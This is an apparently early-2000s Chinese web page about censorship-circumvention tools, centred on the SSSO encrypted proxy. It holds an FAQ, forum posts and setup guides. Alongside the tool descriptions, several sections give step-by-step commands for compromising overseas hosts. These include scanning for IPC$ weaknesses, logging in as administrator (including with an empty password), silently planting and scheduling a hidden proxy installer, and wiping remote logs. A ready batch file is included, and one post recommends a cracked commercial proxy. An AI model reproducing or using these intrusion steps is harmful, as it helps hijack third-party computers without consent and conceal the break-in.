冲破网络封锁，畅游网络的绝招

 | 飞梭网 | 镜象站
破网技术网站推荐 （可用代理上） | 心清似玉 | 轻 舟网
 | 代理看世界 | 新人类社区

安全畅游网络 总述：破网利剑首推SSSO，其次排名为金刚钻(Jap+sgtb)，冲浪网，自由网,傻瓜跳板,代理看世界，花园软件,动态网...它们的最新版本都可安全访问任何被封锁的网页。
软件 | 简介
SSSO | ssso是Stunnel＋SkSockServer＋SocksCap＋OpenSSL的缩写，一款安全性目前最高的破网工具，集合了数种不同的程序使原本纷乱的配置变得井然有序，复杂的安装过程对菜鸟来讲也不过举手之劳。
冲浪网 | 安全可靠，信息传输全过程加密,速度飞快，可匿名(传输过程加密)畅游国外所有网站，独特的加速功能使浏览速度大大加快，超过使用任何代理网关，100%绿色软件,可从软盘启动，浏览不留痕迹，软件可以在开机时自动加载、关机前自动进行清除。本地url不是明文，可以在有本地ie监控器的网吧里面使用。下载地址1 下载地址2 下载地址3 下载地址4 程序小巧，才220ｋ。
金刚钻 | ＝Jap+傻瓜跳板－掌握有点难度。
freenet自由网 | 自由网(freenet)，免费软件，需要JAVA支持，其开发宗旨是为了保障言论自由、突破网上信息封锁。Freenet风靡西方，并被誉为互联网时代最伟大的自由软件，它突破了互联网原有的限制，而充分的挖掘了互联网潜在的共享优势。1、你可以通过freenet匿名发送任何资料。2、你可以匿名浏览、下载任何信息。3、完全的保护你的隐私最新的0.5版客户端下载1 下载地址2
代理跳板 | 代理跳板由snake编写，软件虽然不大，但功能可不小。不但可以浏览网页，还可以使用QQ、ICQ等聊天工具、网络蚂蚁等下载工具，支持realplay在线视听工具等，甚至有的一些ftp工具都可以利用它上传主页呢！如果你要有一个好的跳板，速度绝对比代理服务器快（代理服务器是众人用的，而一个自己找的好跳板就你一个人用）。代理跳板是动态加密的，每一次传递数据的加密方式都不同！
FreeSurf | 代理看世界主页https://uw.slyip.com 程序小巧，170多k。下载页面。
JAP | JavaAnonProxy提供了在Internet上进行匿名和保密访问信息的手段。为每个人提供了易于使用而且开放源代码的软件。JAP保护你的隐私并隐藏你浏览Internet的纪录。现存的大多数匿名访问系统在安全性方面不能达到较高的有效性。它能提供强大的匿名服务，即系统经过所谓的交通分析。这意味着，任何一个企图窃听网络通讯或连接的对手，都得不到任何正在交流的信息，以及谁跟谁进行的交流。虽然JAP的安全性比自由网差一些，但JAP仍然是目前最为好用的匿名访问软件之一。所有信息在通过JAP的每个节点时都经过了动态加密，但JAP仅仅提供Http代理，速度不一定很快，但JAP较稳定，在访问论坛时，JAP具有更大的优势，可以发送内容较多的贴子。
Garden | 1、网上的传输加密通讯。2、不在硬盘存放Garden专用的数据文件－当然IE的临时文件很难避免，需要手动清除。3、避开有些网吧管理软件在浏览器中实现对某些特定域名的监视。当然这只是一种不是很完善的技术手段，并不能解决所有的监视问题。使用域名转换功能时也要小心，比如使用说明中提到的返回的页面中的绝对域名不会被转换的问题。可用国外信箱索取软件：package@garden.no-ip.co 主页下载
动态网 | 采用动态IP技术，突破网络封锁。 当前域名1，当前域名2，当前域名3，当前IP1，当前IP2，当前IP3 动态网订阅信箱1，订阅信箱2，订阅信箱3，让您每天收到最新的IP。
Sockscap32 | 好东西
e-Border | 被NEC称为“完整的Socks解决方案”的e-Border系统客户端部分。
MultiProxy | 可以同时连接多个代理服务器
半遮面 | 由网侠派开发的一种基于浏览器技术的隐写术应用软件，于7月13日发布。是为非技术性用户着想而设计的，只需一点，《半遮面》的加密处理在英特网上几秒钟内提供被禁止的内容。运用 LSB steganographic 技术和AES-256 位加密，它使用户与他们的朋友分享掩藏在看上去象普通的图像中的被监控的信息，是唯一的一种用隐写术工具在英特网上自动地扫描并把解了码的内容传给用户，它是独立的基于IE的浏览器，在用户的系统上不留任何痕迹。作为一个安全措施，内置防止恶意HTML的安全选项。
■Peekabooty，可以一试。Peekabooty是牛教最新推出的和自由网一样的P2P程序，可以避开所 有的网络监控，让你自由自在的在互联网上冲浪，是今后的发展方向。 ■SafeWeb “Triangle Boy”--好像已经终止服务了。没有国外的节点，国内根本无法用。 ■Jproxychain和自助冲浪－－申请非常困难,虽然可行不推荐。
重要说明1 | 以上软件心清似玉 轻舟网 等均有下载，不过一定要用SSL代理才可进入哦，以上主页用代理必定可以访问。也可点击这儿给我留言，我会告诉你如何下载。
重要说明2 | 如果进入主页后显示乱码，请在乱码页面点击鼠标右键，选择编码，再选择“简体中文”即可。


SSSO 精彩问题解答

SSSO问题解答
    SSSO 3.61简介：最安全的破网工具！利用SSSO加密代理服务器，让你自由访问世界的每一个角落！此版本可运行于Win98以上所有操作系统，也适用宽带、拨号一切上网环境。

1、如何使用SSSO？：非常简单：安装后在“开始－－程序”菜单中找到“SSSO－－Change Proxy”，将打开的记事本文件中的“255.255.255.255:443”换成有效的SSSO代理服务器IP和端口，保存退出，点击“SSSO V3.6”的快捷方式将会打开两个程序－－SocksCap和Stunnel，在SocksCap的控制窗口中打开内置的IE浏览器尽情的冲浪吧！
技巧：打开ssso3.6后，一个最简单的添加程序的方法是：直接把程序的快捷方式往SocksCap Control控制台里面拖进去，确定就行了，根本无须自己填写程序路径。

2、XP下不能正常使用ssso,不爽，去有的国内网站不能下载软件
答：XP下要用网景，不能用IE。
下载国内的软件也用ssso啊？难怪ssso代理失效的那么快:) 我如果是主机网管，正在使用这台机子，不用任何程序检测就能知道有问题。所以强烈反对用SSSO代理下载国内软件，
要珍惜资源啊，许多默默无闻的人辛辛苦苦为我们建立了ssso代理，我们居然用来下载国内的软件，这是浪费资源啊。好工具要把它用在锋利的刀口上啊。

3、如何批量验证ssso代理的有效性？
答：ssso助手1.5版就有这个功能啊（ssso远程安装工具包3.7里面就有）。

4、问：4.0版工具包做的SSSO如何验证速度？由于它取消了原来的1122跳板端口，就没办法利用代理猎手来对做的SSSO作速度验证了，这似乎有点不方便。因为各个服务器速度总归是有快慢的，作为使用者理所当然想选择一个速度比较快的来使用。
答：禁止了socks代理的直接使用是为了防止有人用扫描的方法大量获取ssso进行破坏，有利有弊吧，速度可以在浏览时一个一个体会，也可以ping它看速度，哪个服务器快，代理自然也快。

5、在使用SSSO-Friend1.4时的一些问题
1.IPC连接时,一定要用超级用户名 administrator 吗?
2.在使用SSSO-Friend1.4时,开始很顺利,但有时在验证加密跳板时不成功,还出现找不到动态联接文件的提示(libeay32.dll).不知道为什么?
3.我做的sso跳板速度不快.(我用别人的下载AVI文件速度平均150k/s,我自己的才50k/s,有的还更低.)问:怎样使它速度更快?或者说什么段(IP)的速度快,有规律吗?
答：1、只要是超级用户就可以
2、那是因为从SSSO3.6开始，将他放到另一个目录下了，请重新下载一个，已改好了。
3、速度不取决于谁做的，主要是网络连接的速度，以及肉鸡的系统快慢、使用的人多不多等。一般来说，离我们尽的一些发达国家的比较快。

6、这是什么问题？用复制法把SSSO的IP服务器粘贴进“CHANGE PROXY”中，保存好后启动SSSO，而SSSO不能使用，并会出现“STUNNEL 4.03 ON WIN32”的提示：
file stunnel.conf line 2: Specified option name is not valid here Server is down
用ＳＳＳＯ安装助手替换IP服务器，却一切正常，可以使用。什么原因会造成这样的问题？
答：发现保存后格式自动会变:必须要检查一下，怪不得老是不能用!!!!!
正确格式:
client = yes
[ssl2socks]
accept = 127.0.0.1:1913
connect = *.*.*.*:443

变成了错误格式:
client = yes
[ssl2socks]accept = 127.0.0.1:1913
connect = *.*.*.*:443

7、ssso有被封的一天吗？ ssso很好用，推广了吗？会不会被封？
答：ssso永远不会被封的，他没有特征，除非网络上不允许使用SSL，但那是不可能的，大量的邮箱、企业、银行等等都离不开SSL，所以永远也不会被封了，因为就算它们真的搞了什么“成果”出来，时间也来不及了。
它们就是封得只剩80端口了，ssso也一样自由进出的，多一道手续而已。

8、能不能搞个SSSO服务器IP列表?
用以收集SSSO代理,以有利于(在线)变换、选择、改变服务器。
答：目前的ssso助手就有这个功能（安装工具包3.7版），可以改变调度ip，但改变后要重新启动ssso才生效，功能不能太多了，简单的同时也被常人拿来干坏事了。远程安装包里的ssso助手1.52还有测试ssso代理功能。

9、关于ssso的安全问题：
1.ssso代理服务器上的证书是固定的吗？回复1：不是
2.如果我得到证书和代理服务器与客户端的通信数据，那我能知道它的明文吗？
3.假如我将证书该了，做的ssso别人能用吗？
回复2：当然啦，得到“证书和代理服务器与客户端的通信数据”，那你不就和那个远程主机一样了嘛，所要做的就是利用Stunnel解密了。你可以再加个跳板就行了：
程序＝》SocksCap：1912＝》跳板：1912＝》跳板：127.0.0.1：1913＝》Stunnel＋》省略....我没试过，但是原理好像没错，双重加密，就是在本机上又多加了一级跳板代理，利用了跳板加密连跳的功能，但是速度肯定要慢了
回复3：可以用。现在客户端默认是不认证服务器证书的。

再论ssso的安全问题？我得到了个SSSO客户端软件，安装后在WIN98下使用IE。上论坛速度很快，也很快连上internetfreedom。但我有点不解：既然用SSSO来往数据都是加密了的，为什么上inrernet freedom的时候右下角没有锁？
答：SSSO是自己的方法加密的，SSL是公共的方法加密的, IE认得，所以会显示一个锁头。

10、问：跳板4.2和ssso都安装了要注意什么问题呢？
解释： 跳板4.2和ssso同时使用会失去ssso的效果，因为他们占用相同的端口1913。
提示1：若都安装了，不同时使用是可以的。
  使用要点：一定要在sockscap中启动MyIE，就会显示0.0.0.1，而不论SSSO或者跳板是否启动。
如果不在sockscap中启动，那就会显示本机IP。

提示2：如果要同时使用跳板4.2和ssso呢？也是可以的：
删除傻瓜跳板，装一个低版本的sockscap和skgui搭配，将ssso的本机端口由1913改为别的，比如1613等，与ssso搭配的sockscap2.3设置中也要修改。这样就可以同时使用跳板和ssso了。
经测试：用sockscap2.0beta和skgui搭配，sockscap2.3和ssso搭配，同时使用没有冲突。

11、问：局域网的电脑能用ssso吗？普通用法还是有特别其他用法？
答：应该可以。ssso采用端口映射，把国外主机socks5代理映射为加密的443，客户端接收加密数据后再解密为socks。
特别方法：e-Border和SOCKSCAP结合，我没有试过但听说有人成功。
假定局域网提供的是SOCKS代理:
e-Border负责将本机所有的TCP连接通过e-Border设置的SOCKS5(局域网的SOCKS)代理出去。
其他的和非局域网情况一样处理就可以了。e-Border的作用就是绕过局域网代理。

如果局域网提供的是HTTP代理要通过SocksChain转换成SOCKS5代理，这时e-Border得设置除SocksChain外“将本机所有的TCP连接通过e-Border出去”。

12、问：用SSSO出现：警告：进入无法匿名地带！,怎么没回事?
答：出现这种情况，一般是ssso结合ssl代理(比如动态网)用了，那是ssl加密代理自己的设定，不用管他,继续就行了。
也有人用SSSO＋代理看世界FreeSture,点击动态网连接，很方便。

13、为什么我打开了SSSO但却没有出现象说明中写的SocksCap和Stunnel两个窗口，只出现了我的IE浏览器图标呢？
到:开始----程序中找找!!你仔细看一下，那个ie图标是在sockscap里面的吧？如果是这样，那么你直接点那个ie图标就开始用ssso浏览了（当然你要想正常浏览还得更换ssso ip）。stunnel的图标在任务栏里面找找，可能最小化到任务栏里面了。

14、我用SSSO3.6显真实IP,原来是匿名的,可近来我使用的时候都是显真实IP.只要打开https://207.6.92.144/tools/index.htm就能看到我的真实IP. 怎么处理?
答：估计是Cookies问题，用清道夫清理一下系统，就ok了.

15、问：给我个ssso吧！
答：我基本没有时间做这些事，大家看ssso程序简单，但既然给大家用，就要在各种条件和各种系统、环境下测试，要模拟各种情况反复测试，4.0版大概在各种环境下测试了百十次，修改了百十次才定下来。有心人可以去清心论坛求得的。

16、用ssso2.7，我的kv3000说是有病毒？
答：国内的杀毒软件把snake跳板当病毒杀。

17、用ssso＋jap的话还是通过http上网吧，比较快：
答：用法：删除sockscap中的浏览器，把JAP加到sockscap中，然后启动ssso，启动sockscap中JAP，设置浏览器代理127.0.0.1:4001，打开浏览器，OK。
但有人反映：ssso+jap有时显示真实IP：
在SOCKSCAP中启动JAP，用的是DRESDEN－DRESDEN服务器，在SOCKSCAP外启动IE，
登陆https://qxbbs.zapto.org/，有时只显示流量，有时只显示在线人数状况，有时全部可以显示出来，但在主页面上刚才显示的是我的真实IP，现在我回答问题时，又重新试了一儿，显示您的真实ＩＰ 是：141.76.1.121，又正常了，真是奇怪。估计是JAP原因。

18、请问：ssso代理可否当作普通socks5代理使用呢？想把ssso的代理直接填写在sockscap中使用，端口应该怎么填？
答：可以，不过功能不全,具体少了哪些功能我也不太清楚。端口其实就是1122，ssso默认是这个端口。
清心公布的代理，端口不一定都是1122 如果不确定可以扫描一下 。

19:在win98下如何使用ssso？用ssso2.7，我的kv3000说是有病毒？
答：什么病毒都没有，误报。换诺顿吧！国内的杀毒软件把snake跳板当病毒杀.
请看“ssso-jap-msn"使用教程


让你的ssso更快、更安全、更稳定

等级：版主
文章：24
积分：62
让你的ssso更快、更安全、更稳定
现在的ssso3.0较以前已经改进了许多，但每个人还有进一步修改的余地，使之更好些。
    Ssso是由三部分组成：加密部分、socks5代理部分和安装部分。加密部分包括：stunnel-3.22.exe、stunnel.pem、libeay32.dll、libssl32.dll；socks部分是snake的代理跳板sss.exe；安装部分是其它的文件。下面我们一个一个来。
    加密部分：这里有两个地方可改，就是stunnel-3.22.exe可改名，还有就是ssl的端口可改，不要小瞧这个，在肉鸡上安装时是很有用的，但相应用到的地方也得跟着改。
    Socks5代理部分：snake的跳板是很好，但主要的级连、协议转换和加密功能在ssso中用不上，只用上一个socks5功能。而且虽然新版本在传输的稳定性上有了很大改进，但还是不能尽人意，这里我用ccproxy代替它，它本是商业软件，需要在windows图形界面上安装，但经过改装之后，可在命令行下安装。具体使用方法，在自带的说明文件中很详细。共需4个文件ccproxy.exe（可改名）、ccproxy.ini、cdial.dll、uuid.dll。
    安装部分：新版用的是ntservice。这个无需替换了，只简单说明一下：这个软件是自己以服务方式安装，然后运行其配置文件中的程序，最多可带动20个程序，而且支持带运行参数的程序，但有一点要注意，就是要带动的程序必须在system32目录里。共有两个文件ntservice.exe和ntservice.ini，这两个文件都可以改名（但必须要一致），而且可以自定义服务名称。具体使用方法可看自带的说明。
    这个改装后ssso相对也安全一些，因为文件名可以自定义，服务名可以自定义，端口可以自定义，而且ccproxy要比snake跳板稳定，如果愿意的话还可以同时作其他的代理。
    好了，现在可以动手了，把上面10个文件复制到一个文件夹，然后加上hiderun.exe和一个123.bat，仿照ssso的安装也做一个自解压文件，把命令都写在123.bat里。OK，到肉鸡上试一下吧，看看这个ssso是否更快了。
    （注意，本文提到的ccproxy是破解版才行）

本不想写这个东西，因为对新手来说论述的过于简单，对高手来说又没什么可看的，只希望通过本文能抛砖引玉，使ssso这个新型的破网工具更完善，更成熟。

回复： 我现在用的是2.4版的，会有什么安全问题吗？(41字) － yunsky，2002年10月28日
回复： 7楼老大：请问命令行下如何使用CCPROXY？(38字) － jb2002，2002年10月27日
回复： CCProxy可惜体积太大了，我本来也想用它的。(41字) － 白云，2002年10月27日
回复： http://24.165.21.10/articles/ssso/index.htm 有详细说明及软件下载。.(164字) － 同心，2002年10月26日
回复： 我用的就是灰色轨迹的，呵呵。(28字) － asd，2002年10月25日
回复： 补充一下，有的肉鸡ntservice会安装失败，这时可用srvany来替代。..(61字) － 沧海一粟，2002年10月25日
回复： 灰色轨迹的CCProxy v5.2 破解版是否合适？(39字) － qfl861，2002年10月25日


SSSO 原理图解

转帖某网站对ssso原理的理解和扩展应用[转帖]

对SSSO原理的初步解析

（一）ssso是openssl＋stunnel＋socks5构架，第一个是提供ssl加密，第三个是以socks5方式联网，stunnel是把两个连起来，使socks5变成ssl。同理，还有openssl＋stunnel＋http构架，openssl＋stunnel＋socks4构架，等等，这些构架都是使用了“端口映射”的概念。“映射”是什么意思呢？举个例子说，在网络上，可以通过IPC命令把远端机器的c盘映射成本机的z盘，例如，我有两个机器，IP地址分别是127.0.0.1和192.168.0.1，分别位于北京和广州。我在127.0.0.1，想把我的d盘上一个文件复制到192.168.0.1的c盘上，可以通过网络连接到192.168.0.1，然后通过ipc命令把192.168.0.1地c盘映射到127.0.0.1的z盘，这时，127.0.0.1的资源管理器就会多出一个z盘，我可以把这个z盘当成自己本机上的一个硬盘对待，复制、粘贴、剪切等等。这个z盘实际上是192.168.0.1的c盘，但我通过“映射”把它变为127.0.0.1上的z盘，罗嗦了这么多就是让大家对“映射”有个概念。上面说的是“磁盘映射”，其实“端口映射”也是一个道理，就是把远端的一个端口变成本机的一个端口。

好了，现在先从ssso说起：假如我的IP是127.0.0.1，然后在网络的另一端有一个192.168.0.1，网管恰好是我的朋友，已知192.168.0.1已经安装一个snake跳板，端口是1122。现在我想用socks5代理上msn，就想：如果这个192.168.0.1的1122变成我的1913端口就好了，那就可以用它来上msn了。这时就需要openssl和stunnel了，现在那个朋友动手了，运行stunnel，把自己（192.168.0.1）的1122端口映射成自己的（192.168.0.1）443端口（就是本机两个端口之间映射），OK他那里完事了。然后我这里动手，我也运行一个stunnel，把192.168.0.1的443端口映射到我（127.0.0.1）的1913端口,好了，现在我的1913端口就有一个socks5代理了。现在，运行msn，打开代理设置，选socks5代理，填入127.0.0.1：1913，然后开始登陆，信息流向是这样的：msn→127.0.0.1：1913→192.168.0.1：443→192.168.0.1：1122→微软msn服务器，OK，登陆成功，可以和好友聊天了。

如果我想用socks5代理浏览怎么办呢？直接是无法用的，因为IE不支持socks5代理，在1913端口空有一个socks5代理，但IE用不上。这时就需要sockscap了，通过它，象IE这类不能使用socks5代理的软件也可以使用socks5代理了。因为192.168.0.1的socks5代理已经映射过来了，所以sockscap中的socks5代理服务器就是127.0.0.1：1913。

（二） 其实端口映射软件有很多，不必这么麻烦的，把192.168.0.1：1122直接就可以映射到本机（127.0.0.1）的1913端口，而上面的方法多了一道手续，映射了两次。为什么？安全、安全第一啊！这样做从本机（127.0.0.1）的1913到远端（192.168.0.1）之间是有一个ssl通道的，而其他软件只是简单的映射，中间没有加密。
好了，看到这里大家也许明白了，stunnel＋openssl主要起了一个ssl加密通道的作用，而以那种代理方式上网是取决于远端是何种代理，如果远端是http代理，那么映射过来就是一个http代理，这时，msn就应该选http代理，而IE直接就可在“属性”里设置代理了。那ssso为什么选择socks5代理呢，因为socks5代理功能比较多，而且通过sockscap还可以实现远端解析，用来突破网络封锁十分有效。
还有一个没什么用的小技巧顺便说一下，就是本机可以同时运行多个ssso客户端。比如我有两个ssso服务器：10.10.0.1和10.10.0.2，我想通过10.10.0.1上网浏览，通过10.10.0.2上msn，可以这么做，先到轻舟网下载一个shp，只需要其中的stunnel的exe部分，以3.22为例：把3.22的文件夹在c盘复制一个，在d盘复制一个，打开c盘的stunnel文件夹，编辑client_run.bat，把里面的127.0.0.1:80改为127.0.0.1:4444，192.168.0.1:443改为10.10.0.1:443，保存退出，然后运行client_run.bat，打开sockscap，把代理改为127.0.0.1：4444，然后运行sockcap中的浏览器，就可以自由冲浪了；在打开d盘的stunnel文件夹，编辑client_run.bat，把里面的127.0.0.1:80改为127.0.0.1:5555，192.168.0.1:443改为10.10.0.2:443，保存退出，然后运行client_run.bat，打开msn，代理设置为127.0.0.1:5555，然后登陆，就可以和好友惬意地聊天了。上面也是说出了如何改本机ssso端口的方法。

（三）

下面在说一下代理，现在ssso采用的socks5代理是snake的代理跳板，snake的代理跳板虽然还不是很完善，但能替代它的socks5代理还没有出现，它的两个小功能可能大多数人没有注意到，就是server端的串连功能和客户端设置功能。原先大家在使用傻瓜跳板时，是在skservergui中设置经过的跳板，其实skserver也能设置串连的跳板，比如有两台服务器分别是172.168.0.1和172.168.0.2，都在1234端口装有跳板，如果想先经过172.168.0.1，然后连到172.168.0.2，可以这样做：在172.168.0.1上，在命令行下进入跳板所在文件夹，“net stop skserver”（停止跳板的服务）、“sss -config skserver add 172.168.0.2 1234 y”（设置下一个连接的跳板）、“net start skserver”（启动跳板），这时，当你连接172.168.0.1时，它会自动串连172.168.0.2，如果要删除串连的跳板，可以“sss -config skserver del 172.168.0.2 1234”，会提示“The unit is deleted.”；如果172.168.0.2上的跳板只允许172.168.0.1这一个IP连接，可以这样做：在命令行下进入跳板所在文件夹，“net stop skserver”（停止跳板的服务）、“sss -config client add 172.168.0.1 255.255.255.0 y”（设置允许连接的客户端）、“net start skserver”（启动跳板），也可以多允许几个，删除是“sss -config client del 172.168.0.1 255.255.255.0”。这两项设置在某些情况下还是比较有用的，比如在用ssso时想进一步隐藏身份，可以设置跳板的串连，在172.168.0.1上安装ssso，在172.168.0.2上安装snake跳板，这样，对外显示的是172.168.0.2，增强了反跟踪的能力，此时，本机到172.168.0.1是ssl加密，172.168.0.1到172.168.0.2是跳板加密；如果有的人想利用自己的条件向朋友提供跳板服务，却不想被别人占便宜，可以指定特定的IP连接。这两种方法也可结合使用。
如果有的朋友想方便别人，在自己机器上装SSSO服务，可以直接运行ssso2.4版中的s.exe就完成了，它会安装在系统盘中，这个文件是隐藏运行，运行时看不出任何变化，不要以为没有安装而反复运行，里面已经有跳板了，不用先装跳板，安装过程一般一分钟之内就能完成。如果安装之后想看看ssso是否已经启动了，可以这样：先查看跳板是否启动，在“服务”中查看Snake SockProxy Service是否已经启动，也可在命令行下键入net start，看看有没有Snake SockProxy Service；然后在命令行下键入netstat –an,看看有没有443端口，如果都有那基本上可以确定ssso已经在运行中了。如果还不好使可以查看一下是否是防火墙的原因，如是否封锁了1122或443端口，禁止了sss或stunnel连网。为了安全起见，最好改一下跳板的服务端口，因为使用默认的设置有一定的安全隐患，可以这样做：“net stop skserver”（停止跳板的服务）、“sss -config port 12345” （更改端口为12345）、“net start skserver”（启动跳板），也可以改成其它端口，端口号大一些比较好，不要选1024以下的端口。然后到system32目录下，编辑yx.bat，把1122改成12345，重新启动计算机即可。

好了，我对ssso的理解就这些了，个人理解，难免有误，欢迎大家进一步探讨。
（转帖自某网站）


在无盘网吧使用Ssso3.6

无盘网吧做了很多的限制，权限很低。平时大家可能除了动态网,其它工具都不能使用,这里教大家用最傻瓜的方法使用ssso3.6(因为网吧基本上使用的都是windows98)
一)得到下载的权限:
访问 http://cy07.126.com 点击下方"解除对文件下载的限制".成功后会有提示.
二)下载ssso3.6和myie
这两个软件可以备份到自己得邮箱里,每次下载就不必到处找了.因网吧的限制, ssso默认得ie无法工作,所以必须下载一个浏览器.
点击下载连接后会出现一个对话匡,选者"在当前位置运行该程序",下载完毕后会弹出对话匡,把文件解压到本地硬盘,比如 c:\ssso3.6 .
三)安装ssso3.6
安装后在'开始'-'程序'里是无法找到快捷键的,必须在c盘找到 Ssso 文件夹.
找到 ssso.bat 和 ghip.bat 两个文件,分别运行.
四)在sockscap里添加myie,在记事本(stunnel.conf)把ssso代理更换255.255.255.255后保存.
五)使用myie冲浪.

注:如果网吧没有c盘的话可能就无法安装ssso了. 请各位高手补充


SSSO服务器安装步骤详解

Ssso代理服务器的特点：安全－－采用无法破译的SSL方式加密，而且证书可以自己随时更换；多用－－一次安装即获得两个代理，Socks5代理和Ssso加密代理（默认端口分别为1122和443）；隐秘－－远端解析域名，保护上网者隐私。
注：公布的ssso代理，很容易被封。我认为大家最好的解决办法还是学会自己做ssso代理,自己做的ssso代理比公布出来的安全，因为只有你自己知道。所以应该尽量使用自己做ssso代理，公布出来的ssso代理有可能会被封或被监控。要自己做ssso代理，首先要装windows2000系统，一台电脑是可以装两个操作系统的。但要装在不同的分区。还有，装windows2000时，千万不要把硬盘格式改为ntfs,否则你会发现后患无穷。

Ssso服务器是怎么来的呢？1、海外的正义之士自行安装，志愿者请使用Ssso服务器端安装版（Ssso Proxy Server），可到相关网站下载。为了区分，我们把本工具包中的服务器端安装文件（s.exe）叫做“Ssso服务器端隐藏版”，因为它在安装时无声无息，把专供海外朋友在自己主机上安装的那个服务器端安装文件叫“Ssso服务器端安装版”。做然后把IP在相关网站公布，动态服务器可以使用动态域名。2、使用者自己以“黑客”方式在获得权限的海外主机上安装－－我们不提倡黑客行为，但我们在迫不得已的情况下借用一下海外的主机作为跳板来保护自己的隐私和生命安全，而并不进行任何破坏，这并不属于黑客行为。举个例子：当歹徒把一个人的门窗都钉死了然后在屋里放火，主人在墙壁上打洞从邻居家逃命而出，你能说他是私入民宅吗？！下面我们详细介绍怎样在远端服务器安装Ssso代理：

在开始前，建议创建自己的SSL证书（这一步可以省略）。点击“开始－程序－Ssso Tool－创建证书”，（一旦运行请不要中途终止，否则不但不能创建证书，连原来的证书也会失效），程序将会问你以下问题：

Country Name:（回答你的国家名称，必须是两个字母，如美国是US，中国是CN）
State or Province name:（回答所在的州或省的名称）
Locality Name:（回答所在城市的名称）
Organization Name:（回答所在机构、组织的名称）
Organizational Unit Name:（回答所在的部门名称）
Common Name:（回答服务器上网站的名称，如www.abc.com）
Email Address:（回答你的Email地址）

……

证书会自动生成并自动添加进本工具包安装目录下的服务器端隐藏安装程序（s.exe）中。点击程序菜单中的“查看证书”可以查看证书的信息。

服务器端s.exe默认安装端口为443，如果你要使用的服务器443端口被占用，需要更改端口，方法是：在ssso安装目录下找到port2002.bat运行， 运行的结果是将服务器端文件s.exe中的默认443端口改为2002。如果你想用其他端口，只需要用右键点击port2002.bat选“编辑”打开它，将第六行的“2002”改为其他端口保存退出然后双击运行port2002.bat，服务器端s.exe中的端口就改变了。 同样，更改代理跳板的端口则更改1122为其他值。

在远程服务器安装ssso代理，简单说就是首先搜索海外有ipc漏洞的服务器，然后把ssso安装目录下面的服务器端安装文件s.exe上传到远端服务器的WINNT目录下运行。下面是使用本程序自带的ssso伴侣在远端服务器安装的简单过程：

1、使用本程序自带的“IPC扫描器”对海外主机进行扫描，保存有效结果备用。

2、打开“ssso助手”，将搜索到的海外服务器ip填写到“基本设置－－对方主机ip”中（建议在开始前首先检查一下对方的443端口是否被占用，如果被占用就放弃此主机或改变服务器端s.exe中的默认端口再安装：将443填写进“对方端口”中点击“检测”按钮即可显现结果），填写用户和密码，点击“ipc连接”按钮。

3、连接成功后，点击“上传文件－－开始上传”。

4、上传s.exe成功后，点击“设定计划－－查看远程主机时间”，有时会得到两个时间，我们只用远程主机的本地时间，将这个时间再滞后几分钟（如得到远程主机的本地时间是下午02:00，则填写14:02)填写到“计划在远程主机运行程序的时间”栏中，然后点击“下达远程命令计划”按钮。没有意外的话，时间一到，远程的服务器就会运行此命令安装ssso代理。点击“查看远程计划任务清单”按钮可以查看下达的任务是否执行。

5、如果任务已经执行，我们就要对这个ssso代理进行验证了，点击“验证跳板”，填写验证的端口，分别验证socks5跳板和加密跳板。成功的话，一个ssso超级代理就做好了。点击“使用本结果”按钮，这个ssso代理就会自动设置进本机安装的ssso客户端中。打开ssso程序你就可以自由冲浪了。

6、点击“善后处理”，清除远程主机日志和断开该IP的连接。

附：不使用ssso助手安装ssso服务器端的范例：

【在开始菜单的“运行”中输入“CMD”确认打开命令提示符窗口，依次执行下面命令：

net use \\服务器IP\ipc$ "密码" /user:"用户名" (用超级管理员用户名和密码登陆服务器)
copy c:\s.exe \\服务器IP\admin$(拷贝文件到服务器)
net time \\服务器IP(查看服务器上的本地时间)
at \\服务器IP 15:02 s.exe(假如服务器本地时间是下午3:00，指定s.exe在15:02分运行，一定要比服务器上的本地时间滞后几分钟，时间必须是24小时制)
net use \\服务器IP /del(断开与服务器的联系)

时间一到，远端服务器上的s.exe就会自动安装并运行。

所有文件将被自动释放安装在远端服务器的system32目录下。s.exe将在安装后自动删除。】

安全问题

SSSO采用远端解析域名，所有数据都是高强度加密的，目前世界上尚无技术可破解，综合起来看，可以说它是目前所出现的所有破网程序中最为安全的一个。

其他：如果你不打算在自己的电脑上提供SSSO代理服务，请切勿运行服务器端安装文件s.exe，这个文件位于ssso的安装目录下。如果你不小心在本机运行了服务器端s.exe文件，运行sc.bat即可清除。也可将此文件上传到服务器上运行以清除服务器端。

补充：有一次windows2000系统崩溃了，想进入dos格式化重装，结果dos或WIN98找不到ntfs格式的c:盘，我只好到电脑城找人把硬盘的珍贵资料备份到另一块硬盘，然后用fdisk重新格式化整个硬盘，再把资料从另一个硬盘copy过来.......好惨！！


一个简单的制作ssso服务器的批处理文件
白云：原创
    把s.exe和soon.exe和一个批处理文件放到同一个文件夹，运行批处理，1分钟后，ssso代理就做好了。
    soon可到http://www.chinesehack.org/down/show.asp?id=2314 去下载
    批处理的内容是：
net use \\127.0.0.1\ipc$ "" /user:"administrator"
cmd /c "copy s.exe \\127.0.0.1\admin$\system32"
soon 60 \\127.0.0.1 s.exe
net use \\127.0.0.1 /del

  说明：实际制作时要把127.0.0.1换成肉鸡的ip，s.exe要使用3.8版。已经试验成功。
也请乐助把soon替换ssso助手里面的大家最难掌握的at命令部分，一起在远程安装工具3.8中发布。

沧海一粟 ：我试过soon有时会失效，原因不明，后来老老实实用at.
白云：把时间设置为超过60秒就会正常，有的不需要
请问域名有什么要求，能提供一些吗：）？
白云：这个不能提供，最好自己找，因为一公布这个域名大家就都用不成了，网狗也在看，伺机咬人。
ekek: 有时也会有这种情况，比如你用SSSO来这里，在论坛首页看到却是另外一个IP，我想也可能是SSSO服务器网关的IP，如果你在MYIE里设一个普通匿名代理，虽然用ＳＳＳＯ看到的也不是ＳＳＳＯ服务器的ＩＰ。


制作ssso代理的工具

psinfo 本地下载 约56k 自带说明，在命令行下输入psinfo/?即可看到用法。
pstool系列里的一个工具,可以远程查询对方的信息,能分出是NT还是2000,不过较慢。
sysinfo.exe,约4K. 本地下载　验证系统是否win2000的工具，在本机使用，在命令行直接运行即可。
IPC扫描器下载 平台:Win系统 136k 简介:IPC扫描，功能不比流光差，个头却小巧多了。用来安装自己的SSSO，方便不少。
SSSO远程安装使用操作演示 ……本地下载，特别感谢白云提供。


做ssso代理参考

请问:什么样的电脑可以做SSSO服务器，我有国外朋友。。。
他的IP是动态的呢？
他的IP通过MSN给你。或申请免费域名，他上网就更新。
对INTERNET有独立IP就可以。是不是说他的IP是不会变的
是在INTERNET有IP就可以了。不是局域网、NAT等就可以。
让他下载一个服务器端安装版（不是远程安装工具包那个），安装完就可以了。系统win2000、win XP、win NET都可以。

不如你装个windows2000，
